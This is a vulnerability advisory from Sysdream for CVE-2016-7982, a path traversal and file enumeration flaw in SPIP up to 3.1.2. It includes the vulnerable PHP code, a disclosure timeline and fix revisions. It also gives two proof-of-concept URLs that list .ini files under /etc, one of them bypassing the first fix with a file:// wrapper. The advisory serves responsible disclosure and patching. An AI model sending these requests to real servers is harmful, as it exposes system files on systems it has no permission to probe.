SPIP 3.1.2 File Enumeration / Path Traversal
Posted on 20 October 2016
## SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal (CVE-2016-7982) ### Product Description SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence. ### Vulnerability Description The `valider_xml` file can be used to enumerate files on the system. **Access Vector**: remote **Security Risk**: medium **Vulnerability**: CWE-538 **CVSS Base Score**: 4.9 (Medium) **CVE-ID**: CVE-2016-7982 ### Proof of Concept Enumerating `.ini` files inside `/etc` (SPIP 3.1.1) : http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=/etc&ext=ini&recur=2 Bypassing SPIP 3.1.2 protection using PHP Wrappers : http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///etc&ext=ini&recur=2 ### Vulnerable code if (is_dir($url)) { $dir = (substr($url, -1, 1) === '/') ? $url : "$url/"; $ext = !preg_match('/^[.*w]+$/', $req_ext) ? 'php' : $req_ext; $files = preg_files($dir, "$ext$", $limit, $rec); if (!$files and $ext !== 'html') { $files = preg_files($dir, 'html$', $limit, $rec); if ($files) { $ext = 'html'; } } if ($files) { $res = valider_dir($files, $ext, $url); list($err, $res) = valider_resultats($res, $ext === 'html'); File names are stored in `$res` and displayed by `echo` on line 146 : echo "<h1>", $titre, '<br>', $bandeau, '</h1>', "<div style='text-align: center'>", $onfocus, "</div>", $res, fin_page(); ### Timeline (dd/mm/yyyy) * 15/09/2016 : Initial discovery * 26/09/2016 : Contact with SPIP Team * 27/09/2016 : Answer from SPIP Team, sent advisory details * 27/09/2016 : Incorrect fixes for Path Traversal * 27/09/2016 : New proof of concept for bypassing Path Traversal sent. * 27/09/2016 : Bad fix for Path Traversal (23185) * 28/09/2016 : New proof of concept for bypassing fixes for Path Traversal on Windows systems. * 28/09/2016 : Fixes issued Path Traversal (23200) * 30/09/2016 : SPIP 3.1.3 Released ### Fixes * https://core.spip.net/projects/spip/repository/revisions/23207 * https://core.spip.net/projects/spip/repository/revisions/23208 * https://core.spip.net/projects/spip/repository/revisions/23206 * https://core.spip.net/projects/spip/repository/revisions/23202 * https://core.spip.net/projects/spip/repository/revisions/23201 * https://core.spip.net/projects/spip/repository/revisions/23200 * https://core.spip.net/projects/spip/repository/revisions/23191 * https://core.spip.net/projects/spip/repository/revisions/23190 * https://core.spip.net/projects/spip/repository/revisions/23193 * https://core.spip.net/projects/spip/repository/revisions/23188 * https://core.spip.net/projects/spip/repository/revisions/23187 * https://core.spip.net/projects/spip/repository/revisions/23185 * https://core.spip.net/projects/spip/repository/revisions/23182 * https://core.spip.net/projects/spip/repository/revisions/23184 ### Affected versions * Version <= 3.1.2 ### Credits * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream